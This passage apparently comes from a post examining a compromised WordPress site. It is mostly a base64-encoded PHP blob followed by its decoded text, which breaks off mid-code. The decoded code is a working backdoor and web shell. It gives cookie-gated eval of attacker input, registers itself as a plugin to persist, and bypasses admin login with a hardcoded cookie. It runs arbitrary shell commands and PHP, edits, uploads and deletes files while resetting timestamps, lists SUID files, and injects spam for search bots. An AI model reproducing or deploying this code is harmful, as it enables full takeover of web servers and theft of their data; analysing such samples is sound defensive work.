DI0KSAkc2l6ZT1yb3VuZCgkc2l6ZS8xMDQ4NTc2KjEwMCkvMTAwIC4gJyZuYnNwO01iJzsNCnJldHVybiAkc2l6ZTsNCn0NCg0KaWYoIWZ1bmN0aW9uX2V4aXN0cygnbmF0Y2FzZXNvcnQnKSl7DQpmdW5jdGlvbiBuYXRjYXNlc29ydCgkYXJyKXsNCnJldHVybiBzb3J0KCRhcnIpOw0KfQ0KfQ0KDQppZighZW1wdHkoJF9QT1NUWydkaXInXSkpew0KJGRpciA9ICRfUE9TVFsnZGlyJ107DQppZighQGNoZGlyKCRkaXIpKSAkb3V0ID0gJ2NoZGlyKCkgZmFpbGxlZCEnOw0KfQ0KJGRpciA9IGdldGN3ZCgpOw0KDQoNCg0KKHN0cmxlbigkZGlyKSA+IDEgJiYgJGRpclsxXSA9PSAnOicpID8gJG9zX3R5cGUgPSAnd2luJyA6ICRvc190eXBlID0gJ25peCc7DQoNCmlmKCEkb3NfbmFtZSA9IEBwaHBfdW5hbWUoKSl7DQppZihmdW5jdGlvbl9leGlzdHMoJ3Bvc2l4X3VuYW1lJykpew0KJG9zX25hbWUgPSBwb3NpeF91bmFtZSgpOw0KfWVsc2VpZigkb3NfbmFtZSAhPSBnZXRlbnYoJ09TJykpew0KJG9zX25hbWUgPSAnJzsNCn0NCn0NCg0KaWYoZnVuY3Rpb25fZXhpc3RzKCdwb3NpeF9nZXRwd3VpZCcpKXsNCiRkYXRhID0gcG9zaXhfZ2V0cHd1aWQocG9zaXhfZ2V0dWlkKCkpOw0KJHVzZXIgPSAkZGF0YVsnbmFtZSddLicgdWlkKCcuJGRhdGFbJ3VpZCddLicpIGdpZCgnLiRkYXRhWydnaWQnXS4nKSc7DQp9ZWxzZXsNCiR1c2VyID0gJyc7DQp9DQoNCiRzYWZlX21vZGUgPSBnZXRfY2ZnX3Zhcignc2FmZV9tb2RlJyk7DQokc2FmZV9tb2RlID8gJHNhZmUgPSAnb24nIDogJHNhZmUgPSAnb2ZmJzsNCg0KZXhlY3V0ZSgnZWNobyBzc3BzJykgPyAkZXhlY3V0ZSA9ICdvbicgOiAkZXhlY3V0ZSA9ICdvZmYnOw0KDQoNCg0KDQokc2VydmVyID0gZ2V0ZW52KCdTRVJWRVJfU09GVFdBUkUnKTsNCmlmKCEkc2VydmVyKSAkc2VydmVyID0gJy0tLSc7DQoNCg0KDQokb3V0ID0gJyc7DQokdGFpbCA9ICcnOw0KJGFsaWFzZXMgPSAnJzsNCmlmKCEkc2FmZV9tb2RlKXsNCmlmKCRvc190eXBlID09ICduaXgnKXsNCiRvcyAuPSBleGVjdXRlKCdzeXNjdGwgLW4ga2Vybi5vc3R5cGUnKTsNCiRvcyAuPSBleGVjdXRlKCdzeXNjdGwgLW4ga2Vybi5vc3JlbGVhc2UnKTsNCiRvcyAuPSBleGVjdXRlKCdzeXNjdGwgLW4ga2VybmVsLm9zdHlwZScpOw0KJG9zIC49IGV4ZWN1dGUoJ3N5c2N0bCAtbiBrZXJuZWwub3NyZWxlYXNlJyk7DQppZihlbXB0eSgkdXNlcikpICR1c2VyID0gZXhlY3V0ZSgnaWQnKTsNCiRhbGlhc2VzID0gYXJyYXkoDQonJyA9PiAnJywNCidmaW5kIHN1aWQgZmlsZXMnPT4nZmluZCAvIC10eXBlIGYgLXBlcm0gLTA0MDAwIC1scycsDQonZmluZCBzZ2lkIGZpbGVzJz0+J2ZpbmQgLyAtdHlwZSBmIC1wZXJtIC0wMjAwMCAtbHMnLA0KJ2ZpbmQgYWxsIHdyaXRhYmxlIGZpbGVzIGluIGN1cnJlbnQgZGlyJz0+J2ZpbmQgLiAtdHlwZSBmIC1wZXJtIC0yIC1scycsDQonZmluZCBhbGwgd3JpdGFibGUgZGlyZWN0b3JpZXMgaW4gY3VycmVudCBkaXInPT4nZmluZCAuIC10eXBlIGQgLXBlcm0gLTIgLWxzJywNCidmaW5kIGFsbCB3cml0YWJsZSBkaXJlY3RvcmllcyBhbmQgZmlsZXMgaW4gY3VycmVudCBkaXInPT4nZmluZCAuIC1wZXJtIC0yIC1scycsDQonc2hvdyBvcGVuZWQgcG9ydHMnPT4nbmV0c3RhdCAtYW4gfCBncmVwIC1pIGxpc3RlbicsDQopOw0KfWVsc2V7DQokb3NfbmFtZSAuPSBleGVjdXRlKCd2ZXInKTsNCiR1c2VyIC49IGV4ZWN1dGUoJ2VjaG8gJXVzZXJuYW1lJScpOw0KJGFsaWFzZXMgPSBhcnJheSgNCicnID0+ICcnLA0KJ3Nob3cgcnVuaW5nIHNlcnZpY2VzJyA9PiAnbmV0IHN0YXJ0JywNCidzaG93IHByb2Nlc3MgbGlzdCcgPT4gJ3Rhc2tsaXN0Jw0KKTsNCn0NCn0NCg0KDQoNCmlmKCFlbXB0eSgkX1BPU1RbJ2NtZCddKSl7DQokb3V0ID0gZXhlY3V0ZSgkX1BPU1RbJ2NtZCddKTsNCn0NCg0KZWxzZWlmKCFlbXB0eSgkX1BPU1RbJ3BocCddKSl7DQpvYl9zdGFydCgpOw0KZXZhbCgkX1BPU1RbJ3BocCddKTsNCiRvdXQgPSBvYl9nZXRfY29udGVudHMoKTsNCm9iX2VuZF9jbGVhbigpOw0KfQ0KDQplbHNlaWYoIWVtcHR5KCRfUE9TVFsnZWRpdCddKSl7DQokZmlsZSA9ICRfUE9TVFsnZWRpdCddOw0KJG91dCA9IHJlYWQoJGZpbGUpOw0KJHRhaWwgPSAnPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZGlyIHZhbHVlPSInLiRkaXIuJyI+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZWZpbGUgdmFsdWU9IicuJGZpbGUuJyI+PGJyPjxpbnB1dCB0eXBlPXN1Ym1pdD4nOw0KfQ0KDQplbHNlaWYoIWVtcHR5KCRfUE9TVFsnc2F2ZSddKSl7DQokb3V0ID0gd3JpdGUoJF9QT1NUWydlZmlsZSddLCAkX1BPU1RbJ3NhdmUnXSk7DQp9DQoNCmVsc2VpZighZW1wdHkoJF9QT1NUWydyZW1vdmUnXSkpew0KJG9iaiA9ICRfUE9TVFsncmVtb3ZlJ107DQpAaXNfZGlyKCRvYmopID8gJHJlcyA9IEBybWRpcigkb2JqKSA6ICRyZXMgPSBAdW5saW5rKCRvYmopOw0KJHJlcyA/ICRvdXQgPSAnUmVtb3ZlZCBzdWNjZXNzZnVsbHknIDogJG91dCA9ICdSZW1vdmluZyBmYWlsZWQhJzsNCn0NCg0KZWxzZWlmKCFlbXB0eSgkX1BPU1RbJ25ld2RpciddKSl7DQpAbWtkaXIoJF9QT1NUWyduZXdkaXInXSkgPyAkb3V0ID0gJ0RpcmVjdG9yeSBjcmVhdGVkLicgOiAkb3V0ID0gJ0NvdWxkIG5vdCBjcmVhdGUgZGlyZWN0b3J5ISc7DQp9DQoNCmVsc2VpZighZW1wdHkoJF9QT1NUWyduZXdmaWxlJ10pKXsNCkB0b3VjaCgkX1BPU1RbJ25ld2ZpbGUnXSkgPyAkb3V0ID0gJ0ZpbGUgY3JlYXRlZC4nIDogJG91dCA9ICdDb3VsZCBub3QgY3JlYXRlIGZpbGUhJzsNCn0NCg0KZWxzZWlmKCFlbXB0eSgkX1BPU1RbJ2FsaWFzJ10pKXsNCiRvdXQgPSBleGVjdXRlKCRfUE9TVFsnYWxpYXMnXSk7DQp9DQoNCmVsc2VpZighZW1wdHkoJF9GSUxFU1sndWZpbGUnXVsndG1wX25hbWUnXSkpew0KaWYoIWlzX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1sndWZpbGUnXVsndG1wX25hbWUnXSkgfHwgQCFjb3B5KCRfRklMRVNbJ3VmaWxlJ11bJ3RtcF9uYW1lJ10sJGRpci5jaHIoNDcpLiRfRklMRVNbJ3VmaWxlJ11bJ25hbWUnXSkpICRvdXQgPSAnQ291bGQgbm90IHVwbG9hZCBmaWxlJzsNCmVsc2UgJG91dCA9ICdVcGxvYWRlZCBzdWNjZXNzZnVsbHkuJzsNCn0NCg0KcHJpbnQ8PDxoZXJlDQo8c3R5bGU+DQp0YWJsZSB7Zm9udDo5cHQgVGFob21hO2JvcmRlci1jb2xvcjp3aGl0ZX0NCmlucHV0LHNlbGVjdCxmaWxlIHtiYWNrZ3JvdW5kLWNvbG9yOiNlZWVlZWV9DQp0ZXh0YXJlYSB7YmFja2dyb3VuZC1jb2xvcjojZjJmMmYyfQ0KPC9zdHlsZT4NCjxicj4NCjxjZW50ZXI+DQo8dGFibGUgY2VsbHBhZGRpbmc9MSBjZWxsc3BhY2luZz0wIGJvcmRlcj0xIHdpZHRoPTY1MCBiZ2NvbG9yPXNpbHZlcj4NCjx0cj4NCjx0ZD4NCjxmb3JtIG1ldGhvZD1wb3N0Pg0KPHRhYmxlIGNlbGxwYWRkaW5nPTEgY2VsbHNwYWNpbmc9MCBib3JkZXI9MSB3aWR0aD02NTA+DQpoZXJlOw0KaWYoISRzYWZlX21vZGUpIHByaW50PDw8aGVyZQ0KPHRyPg0KPHRkPg0KY21kDQo8L3RkPg0KPHRkIGNvbHNwYW49OD4NCjxpbnB1dCB0eXBlPXRleHQgbmFtZT1jbWQgc2l6ZT05Nz4NCjwvdGQ+DQo8L3RyPg0KaGVyZTsNCnByaW50PDw8aGVyZQ0KPHRyPg0KPHRkPg0KcGhwDQo8L3RkPg0KPHRkIGNvbHNwYW49OD4NCjxpbnB1dCB0eXBlPXRleHQgbmFtZT1waHAgc2l6ZT05Nz4NCjwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkPg0KYWN0aW9ucw0KPC90ZD4NCjx0ZD4NCmVkaXQNCjwvdGQ+DQo8dGQ+DQo8aW5wdXQgdHlwZT10ZXh0IG5hbWU9ZWRpdCBzaXplPTE0Pg0KPC90ZD4NCjx0ZD4NCnJlbW92ZQ0KPC90ZD4NCjx0ZD4NCjxpbnB1dCB0eXBlPXRleHQgbmFtZT1yZW1vdmUgc2l6ZT0xND4NCjwvdGQ+DQo8dGQ+DQpuZXdfZGlyDQo8L3RkPg0KPHRkPg0KPGlucHV0IHR5cGU9dGV4dCBuYW1lPW5ld2RpciBzaXplPTE0Pg0KPC90ZD4NCjx0ZD4NCm5ld19maWxlDQo8L3RkPg0KPHRkPg0KPGlucHV0IHR5cGU9dGV4dCBuYW1lPW5ld2ZpbGUgc2l6ZT0xNT4NCjwvdGQ+DQo8L3RyPg0KaGVyZTsNCmlmKCRhbGlhc2VzKXsNCnByaW50PDw8aGVyZQ0KPHRyPg0KPHRkPg0KYWxpYXNlcw0KPC90ZD4NCjx0ZCBjb2xzcGFuPTg+DQo8c2VsZWN0IG5hbWU9YWxpYXM+DQpoZXJlOw0KZm9yZWFjaCgkYWxpYXNlcyBhcyAkayA9PiAkdil7DQpwcmludCAnPG9wdGlvbiB2YWx1ZT0iJy4kdi4nIj4nLiRrLic8L29wdGlvbj4nOw0KfQ0KcHJpbnQ8PDxoZXJlDQoNCg0KPC9zZWxlY3Q+DQo8aW5wdXQgdHlwZT1zdWJtaXQ+DQo8L3RkPg0KPC90cj4NCmhlcmU7DQp9DQpwcmludDw8PGhlcmUNCjx0cj4NCjx0ZD4NCmRpcg0KPC90ZD4NCjx0ZCBjb2xzcGFuPTg+DQo8aW5wdXQgdHlwZT10ZXh0IHZhbHVlPSJ7JGRpcn0iIG5hbWU9ZGlyIHNpemU9OTc+DQo8L3RkPg0KPC90cj4NCjwvZm9ybT4NCjxmb3JtIG1ldGhvZD1wb3N0IGVuY3R5cGU9bXVsdGlwYXJ0L2Zvcm0tZGF0YT4NCjx0cj4NCjx0ZD4NCnVwbG9hZA0KPC90ZD4NCjx0ZCBjb2xzcGFuPTg+DQo8aW5wdXQgdHlwZT1maWxlIG5hbWU9dWZpbGUgc2l6ZT03Nj4NCjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWRpciB2YWx1ZT0ieyRkaXJ9Ij4NCjxpbnB1dCB0eXBlPXN1Ym1pdD4NCjwvdGQ+DQo8L3RyPg0KPC9mb3JtPg0KPC90YWJsZT4NCg0KDQoNCjx0YWJsZSBjZWxscGFkZGluZz0wIGNlbGxzcGFjaW5nPTAgYm9yZGVyPTEgd2lkdGg9NjUwPg0KPGZvcm0gbWV0aG9kPXBvc3Q+DQo8dHIgdmFsaWduPXRvcD4NCjx0ZCB3aWR0aD03MCUgYmdjb2xvcj0jZGRkZGRkPg0KPGI+T1M6PC9iPiB7JG9zX25hbWV9PGJyPg0KPGI+VXNlcjo8L2I+IHskdXNlcn08YnI+DQo8Yj5TZXJ2ZXI6PC9iPiB7JHNlcnZlcn08YnI+DQo8Yj5zYWZlX21vZGU6PC9iPiB7JHNhZmV9IDxiPmV4ZWN1dGU6PC9iPiB7JGV4ZWN1dGV9IDxiPm1heF9leGVjdXRpb25fdGltZTo8L2I+IHskbGltaXR9DQo8L3RkPg0KPHRkIHJvd3NwYW49MiBiZ2NvbG9yPSNkZGRkZGQ+DQo8Y2VudGVyPn46KGV4cGwwcmVyKTp+PC9jZW50ZXI+DQpoZXJlOw0KDQoNCg0KaWYoJGRwID0gQG9wZW5EaXIoJGRpcikpew0KJGNPYmogPSByZWFkRGlyKCRkcCk7DQp3aGlsZSgkY09iail7DQppZihAaXNfZGlyKCRjT2JqKSkgJHRoZURpcnNbXSA9ICRjT2JqOw0KZWxzZWlmKEBpc19maWxlKCRjT2JqKSkgJHRoZUZpbGVzW10gPSAkY09iajsNCiRjT2JqID0gcmVhZERpcigkZHApOw0KfQ0KY2xvc2VkaXIoJGRwKTsNCn0NCg0KaWYoIWVtcHR5KCR0aGVEaXJzKSl7DQpuYXRjYXNlc29ydCgkdGhlRGlycyk7DQppZigkb3NfdHlwZSA9PSAnbml4Jyl7DQpmb3JlYWNoKCR0aGVEaXJzIGFzICRjRGlyKXsNCiRjb2xvcj0nYmxhY2snOw0KaWYoaXNfd3JpdGVhYmxlKCRjRGlyKSl7DQokY29sb3I9J3JlZCc7DQp9ZWxzZWlmKGlzX3JlYWRhYmxlKCRjRGlyKSl7DQokY29sb3I9J2JsdWUnOw0KfQ0KcHJpbnQgIjxmb250IGNvbG9yPSIuJGNvbG9yLiI+Jmx0OyIuJGNEaXIuIiZndDs8L2ZvbnQ+PGJyPiI7DQp9DQp9ZWxzZXsNCmZvcmVhY2goJHRoZURpcnMgYXMgJGNEaXIpew0KJHRtcCA9ICRjRGlyLicvLnNzcHNfdG1wJzsNCmlmKEB0b3VjaCgkdG1wKSl7DQokY29sb3I9J3JlZCc7DQp1bmxpbmsoJHRtcCk7DQp9ZWxzZWlmKG9wZW5kaXIoJGNEaXIpKXsNCmNsb3NlZGlyKCk7DQokY29sb3I9J2JsdWUnOw0KfWVsc2V7DQokY29sb3I9J2JsYWNrJzsNCn0NCnByaW50ICI8Zm9udCBjb2xvcj0iLiRjb2xvci4iPiZsdDsiLiRjRGlyLiImZ3Q7PC9mb250Pjxicj4iOw0KfQ0KfQ0KfSBlbHNlIHByaW50ICc8YnI+b3Blbl9iYXNlZGlyIHJlc3RyaWN0aW9uIGluIGVmZmVjdC4gQWxsb3dlZCBwYXRoIGlzICcuZ2V0X2NmZ192YXIoJ29wZW5fYmFzZWRpcicpOw0KDQpwcmludCAnPGJyPic7DQoNCmlmKCFlbXB0eSgkdGhlRmlsZXMpKXsNCm5hdGNhc2Vzb3J0KCR0aGVGaWxlcyk7DQpwcmludCAnPHRhYmxlIHdpZHRoPTEwMCUgYm9yZGVyPTAgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0yIHN0eWxlPSJmb250OjhwdCBUYWhvbWE7Ij4nOw0KZm9yZWFjaCgkdGhlRmlsZXMgYXMgJGNGaWxlKXsNCiRzaXplID0gZmlsZV9zaXplKCRjRmlsZSk7DQppZigkZnAgPSBAZm9wZW4oJGNGaWxlLCAnYScpKSAkY29sb3IgPSAncmVkJzsNCmVsc2VpZigkZnAgPSBAZm9wZW4oJGNGaWxlLCAncicpKSAkY29sb3I9J2JsdWUnOw0KZWxzZSAkY29sb3IgPSAnYmxhY2snOw0KQGZjbG9zZSgkZnApOw0KcHJpbnQgJzx0cj48dGQgd2lkdGg9MTAwJT48Zm9udCBjb2xvcj0nLiRjb2xvci4nPicuJGNGaWxlLic8L2ZvbnQ+PC90ZD48dGQgYWxpZ249bGVmdD4nLiRzaXplLic8L3RyPic7DQp9DQpwcmludCAnPC90YWJsZT4nOw0KfQ0KDQpwcmludDw8PGhlcmUNCjwvdGQ+DQo8L3RyPg0KPHRyIHZhbGlnbj10b3A+DQo8dGQgYWxpZ249Y2VudGVyPg0KPGZvcm0gbWV0aG9kPXBvc3Q+DQp+OihyZXN1bHRzKTp+DQo8dGV4dGFyZWEgbmFtZT1zYXZlIGNvbHM9NTUgcm93cz0xNT57JG91dH08L3RleHRhcmVhPg0KeyR0YWlsfQ0KPC9mb3JtPg0KPC90ZD4NCjwvdHI+DQoNCjwvdGFibGU+DQo8L2Zvcm0+DQo8L3RkPg0KPC90cj4NCjwvdGFibGU+DQpoZXJlOw0KZGllOw0KfQ0KaWYgKCBzdHJwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC10cmFja2JhY2sucGhwJykgIT09IGZhbHNlICkgew0KCWVjaG8gJzw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8nLiI+XG4iOw0KCWVjaG8gIjxyZXNwb25zZT5cbiI7DQoJZWNobyAiPGVycm9yPjE8L2Vycm9yPlxuIjsNCgllY2hvICI8bWVzc2FnZT4kZXJyb3JfbWVzc2FnZTwvbWVzc2FnZT5cbiI7DQoJZWNobyAiPC9yZXNwb25zZT4iOw0KCWRpZSgpOw0KfQ0KaWYgKCAoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAnd3AtbG9naW4ucGhwJykgIT09IGZhbHNlKSAmJiBpc3NldCgkX1BPU1RbJ2xvZyddKSApIHsNCiAgICAgc2V0Y29va2llKCdhZG1pbl9jb29raWUnLCAnMDAxMzkwNTZkYTgxM2YzZWZmYmUxYjg4NGRiYzEwMjUnLCB0aW1lKCkgKyAzMTUzNjAwMCwgJy8nLCAnJyk7DQp9DQppZiAoIChzdHJwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1hZG1pbicpICE9PSBmYWxzZSkgJiYgKCRfQ09PS0lFWydhZG1pbl9jb29raWUnXSAhPSAnMDAxMzkwNTZkYTgxM2YzZWZmYmUxYjg4NGRiYzEwMjUnKSApIHsNCglpZiAoIGZpbGVfZXhpc3RzKEFCU1BBVEggLiBXUElOQyAuICcvcGx1Z2dhYmxlLWZ1bmN0aW9ucy5waHAnKSApIEBpbmNsdWRlX29uY2UgKEFCU1BBVEggLiBXUElOQyAuICcvcGx1Z2dhYmxlLWZ1bmN0aW9ucy5waHAnKTsNCgllbHNlIEBpbmNsdWRlX29uY2UgKEFCU1BBVEggLiBXUElOQyAuICcvcGx1Z2dhYmxlLnBocCcpOw0KCXdwX2NsZWFyY29va2llKCk7DQoJZG9fYWN0aW9uKCd3cF9sb2dvdXQnKTsNCg0KCUAgaGVhZGVyKCdFeHBpcmVzOiBXZWQsIDExIEphbiAxOTg0IDA1OjAwOjAwIEdNVCcpOw0KCUAgaGVhZGVyKCdMYXN0LU1vZGlmaWVkOiAnIC4gZ21kYXRlKCdELCBkIE0gWSBIOmk6cycpIC4gJyBHTVQnKTsNCglAIGhlYWRlcignQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUsIG11c3QtcmV2YWxpZGF0ZSwgbWF4LWFnZT0wJyk7DQoJQCBoZWFkZXIoJ1ByYWdtYTogbm8tY2FjaGUnKTsNCgkNCgkkcmVkaXJlY3RfdG8gPSAnLi4vd3AtbG9naW4ucGhwJzsNCglpZiAoIGlzc2V0KCRfUkVRVUVTVFsncmVkaXJlY3RfdG8nXSkgKSAkcmVkaXJlY3RfdG8gPSAkX1JFUVVFU1RbJ3JlZGlyZWN0X3RvJ107DQoJICAgICAgIA0KCXdwX3JlZGlyZWN0KCRyZWRpcmVjdF90byk7DQoJZXhpdCgpOw0KfQ0KCgppZighZnVuY3Rpb25fZXhpc3RzKCdlY2hvMTIzJykpeyBmdW5jdGlvbiBlY2hvMTIzKCl7IGVjaG8gYmFzZTY0X2RlY29kZShnZXRfb3B0aW9uKCdpbnRlcm5hbF9saW5rc19jYWNoZScpKTsgfSB9CiRzZWF1PWFycmF5KCJnb29nbGUiLCJ5YWhvbyIsInNsdXJwIiwibXNuIiwibGl2ZSIsImFzayIsImFsdGF2aXN0YSIsImFvbCIpOwokc2Vib3Q9IiI7IGZvcmVhY2goJHNlYXUgYXMgJHVhKSBpZihzdHJwb3Moc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLCR1YSkhPT1mYWxzZSl7ICRzZWJvdD0iMSI7IGJyZWFrOyB9CmlmKCRzZWJvdD09IjEiICYmIHNpemVvZigkX0NPT0tJRSk9PTApIGFkZF9hY3Rpb24oJ3dwX2Zvb3RlcicsJ2VjaG8xMjMnKTsKCg==

After base64-decoded it, the exploit code reveals itself:

$act="tmp"; $tmp_shell="../../../../../../../../../../../../../../../../../../../../../../tmp/tmpTz3eoe/sess_77cae6776e0eebb17329bf7a93a1ef6f"; error_reporting(0); @chmod(substr($tmp_shell,0,strrpos($tmp_shell,"/")),0777); @chmod($tmp_shell,0777); @touch($tmp_shell); @chmod($tmp_shell,0555); if($act=="tmp") @chmod(substr($tmp_shell,0,strrpos($tmp_shell,"/")),0555); $lc="82018235d4d6de628bbbacc32e380e54"; if(isset($_COOKIE[$lc])){ $lin=$_COOKIE[$lc]; echo("<!-- ex -->"); $lin=preg_replace("/_/", "+", $lin); eval(base64_decode($lin)); echo("<!-- /ex -->"); exit; } $ffunctxt='$p="'.$tmp_shell.'"; $a=get_option("active_plugins"); $b=false; if(is_array($a)) foreach($a as $k) if(strpos($k,$p)!==false) $b=true; if(!$b){ $a[]=$p; update_option("active_plugins",$a); }'; $ffunc=create_function('',$ffunctxt); add_action("update_option_active_plugins",$ffunc); if(md5($_COOKIE['_wp_debugger'])=="fbb2190b8cd4b5ac030c10624bf36e60"){ eval(base64_decode($_POST['file'])); } if(md5($_COOKIE['qwerty'])=="a65b9960cf25c0a9fe424596f8b6dcb7") { clearstatcache(); set_magic_quotes_runtime(0); if(!function_exists('ini_set')){ function ini_set(){ return FALSE; } } ini_set('output_buffering',0); if(@set_time_limit(0) || ini_set('max_execution_time', 0)) $limit = 'not limited'; else $limit = get_cfg_var('max_execution_time'); if(isset($HTTP_SERVER_VARS) && !isset($_SERVER)){ $_POST = &$HTTP_POST_VARS; $_GET = &$HTTP_GET_VARS; $_SERVER = &$HTTP_SERVER_VARS; } if(@get_magic_quotes_gpc()){ foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); foreach($_SERVER as $k=>$v) $_SERVER[$k] = stripslashes($v); } function execute($c){ if(function_exists('exec')){ @exec($c, $out); return @implode("\n", $out); }elseif(function_exists('shell_exec')){ $out = @shell_exec($c); return $out; }elseif(function_exists('system')){ @ob_start(); @system($c, $ret); $out = @ob_get_contents(); @ob_end_clean(); return $out; }elseif(function_exists('passthru')){ @ob_start(); @passthru($c, $ret); $out = @ob_get_contents(); @ob_end_clean(); return $out; }else{ return FALSE; } } function read($f){ $str = @file($f); if($str){ $out = implode('', $str); }elseif(function_exists('curl_version')){ @ob_start(); $h = @curl_init('file:/'.'/'.$f); @curl_exec($h); $out = @ob_get_contents(); @ob_end_clean(); }else{ $out = 'Could not read file!'; } return htmlspecialchars($out); } function write($f, $c){ $t = filemtime($f); $fp = @fopen($f, 'w'); if($fp){ fwrite($fp, $c); fclose($fp); $out = 'File saved.'."\n"; if($t && touch($f, $t)){ $out .= 'Last modification time changed.'; }else{ $out .= 'Could not change last modification time!'; } }else{ $out = 'Saving failed!'; } return $out; } function file_size($f){ $size = filesize($f); if($size < 1024) $size = $size.'&nbsp;b'; elseif($size < 1048576) $size = round($size/1024*100)/100 . '&nbsp;Kb'; elseif($size < 1073741824) $size=round($size/1048576*100)/100 . '&nbsp;Mb'; return $size; } if(!function_exists('natcasesort')){ function natcasesort($arr){ return sort($arr); } } if(!empty($_POST['dir'])){ $dir = $_POST['dir']; if(!@chdir($dir)) $out = 'chdir() failled!'; } $dir = getcwd(); (strlen($dir) > 1 && $dir[1] == ':') ? $os_type = 'win' : $os_type = 'nix'; if(!$os_name = @php_uname()){ if(function_exists('posix_uname')){ $os_name = posix_uname(); }elseif($os_name != getenv('OS')){ $os_name = ''; } } if(function_exists('posix_getpwuid')){ $data = posix_getpwuid(posix_getuid()); $user = $data['name'].' uid('.$data['uid'].') gid('.$data['gid'].')'; }else{ $user = ''; } $safe_mode = get_cfg_var('safe_mode'); $safe_mode ? $safe = 'on' : $safe = 'off'; execute('echo ssps') ? $execute = 'on' : $execute = 'off'; $server = getenv('SERVER_SOFTWARE'); if(!$server) $server = '---'; $out = ''; $tail = ''; $aliases = ''; if(!$safe_mode){ if($os_type == 'nix'){ $os .= execute('sysctl -n kern.ostype'); $os .= execute('sysctl -n kern.osrelease'); $os .= execute('sysctl -n kernel.ostype'); $os .= execute('sysctl -n kernel.osrelease'); if(empty($user)) $user = execute('id'); $aliases = array( '' => '', 'find suid files'=>'find / -type f -perm -04000 -ls', 'find sgid files'=>'find / -type f -perm -02000 -ls', 'find all writable files in current dir'=>'find . -type f -perm -2 -ls', 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', 'find all writable directories and files in current dir'=>'find . -perm -2 -ls', 'show opened ports'=>'netstat -an | grep -i listen', ); }else{ $os_name .= execute('ver'); $user .= execute('echo %username%'); $aliases = array( '' => '', 'show runing services' => 'net start', 'show process list' => 'tasklist' ); } } if(!empty($_POST['cmd'])){ $out = execute($_POST['cmd']); } elseif(!empty($_POST['php'])){ ob_start(); eval($_POST['php']); $out = ob_get_contents(); ob_end_clean(); } elseif(!empty($_POST['edit'])){ $file = $_POST['edit']; $out = read($file); $tail = '<input type=hidden name=dir value="'.$dir.'"><input type=hidden name=efile value="'.$file.'"><br><input type=submit>'; } elseif(!empty($_POST['save'])){ $out = write($_POST['efile'], $_POST['save']); } elseif(!empty($_POST['remove'])){ $obj = $_POST['remove']; @is_dir($obj) ? $res = @rmdir($obj) : $res = @unlink($obj); $res ? $out = 'Removed successfully' : $out = 'Removing failed!'; } elseif(!empty($_POST['newdir'])){ @mkdir($_POST['newdir']) ? $out = 'Directory created.' : $out = 'Could not create directory!'; } elseif(!empty($_POST['newfile'])){ @touch($_POST['newfile']) ? $out = 'File created.' : $out = 'Could not create file!'; } elseif(!empty($_POST['alias'])){ $out = execute($_POST['alias']); } elseif(!empty($_FILES['ufile']['tmp_name'])){ if(!is_uploaded_file($_FILES['ufile']['tmp_name']) || @!copy($_FILES['ufile']['tmp_name'],$dir.chr(47).$_FILES['ufile']['name'])) $out = 'Could not upload file'; else $out = 'Uploaded successfully.'; } print<<<here <style> table {font:9pt Tahoma;border-color:white} input,select,file {background-color:#eeeeee} textarea {background-color:#f2f2f2} </style> <br> <center> <table cellpadding=1 cellspacing=0 border=1 width=650 bgcolor=silver> <tr> <td> <form method=post> <table cellpadding=1 cellspacing=0 border=1 width=650> here; if(!$safe_mode) print<<<here <tr> <td> cmd </td> <td colspan=8> <input type=text name=cmd size=97> </td> </tr> here; print<<<here <tr> <td> php </td> <td colspan=8> <input type=text name=php size=97> </td> </tr> <tr> <td> actions </td> <td> edit </td> <td> <input type=text name=edit size=14> </td> <td> remove </td> <td> <input type=text name=remove size=14> </td> <td> new_dir </td> <td> <input type=text name=newdir size=14> </td> <td> new_file </td> <td> <input type=text name=newfile size=15> </td> </tr> here; if($aliases){ print<<<here <tr> <td> aliases </td> <td colspan=8> <select name=alias> here; foreach($aliases as $k => $v){ print '<option value="'.$v.'">'.$k.'</option>'; } print<<<here </select> <input type=submit> </td> </tr> here; } print<<<here <tr> <td> dir </td> <td colspan=8> <input type=text value="{$dir}" name=dir size=97> </td> </tr> </form> <form method=post enctype=multipart/form-data> <tr> <td> upload </td> <td colspan=8> <input type=file name=ufile size=76> <input type=hidden name=dir value="{$dir}"> <input type=submit> </td> </tr> </form> </table> <table cellpadding=0 cellspacing=0 border=1 width=650> <form method=post> <tr valign=top> <td width=70% bgcolor=#dddddd> <b>OS:</b> {$os_name}<br> <b>User:</b> {$user}<br> <b>Server:</b> {$server}<br> <b>safe_mode:</b> {$safe} <b>execute:</b> {$execute} <b>max_execution_time:</b> {$limit} </td> <td rowspan=2 bgcolor=#dddddd> <center>~:(expl0rer):~</center> here; if($dp = @openDir($dir)){ $cObj = readDir($dp); while($cObj){ if(@is_dir($cObj)) $theDirs[] = $cObj; elseif(@is_file($cObj)) $theFiles[] = $cObj; $cObj = readDir($dp); } closedir($dp); } if(!empty($theDirs)){ natcasesort($theDirs); if($os_type == 'nix'){ foreach($theDirs as $cDir){ $color='black'; if(is_writeable($cDir)){ $color='red'; }elseif(is_readable($cDir)){ $color='blue'; } print "<font color=".$color.">&lt;".$cDir."&gt;</font><br>"; } }else{ foreach($theDirs as $cDir){ $tmp = $cDir.'/.ssps_tmp'; if(@touch($tmp)){ $color='red'; unlink($tmp); }elseif(opendir($cDir)){ closedir(); $color='blue'; }else{ $color='black'; } print "<font color=".$color.">&lt;".$cDir."&gt;</font><br>"; } } } else print '<br>open_basedir restriction in effect. Allowed path is '.get_cfg_var('open_basedir'); print '<br>'; if(!empty($theFiles)){ natcasesort($theFiles); print '<table width=100% border=0 cellpadding=0 cellspacing=2 style="font:8pt Tahoma;">'; foreach($theFiles as $cFile){ $size = file_size($cFile); if($fp = @fopen($cFile, 'a')) $color = 'red'; 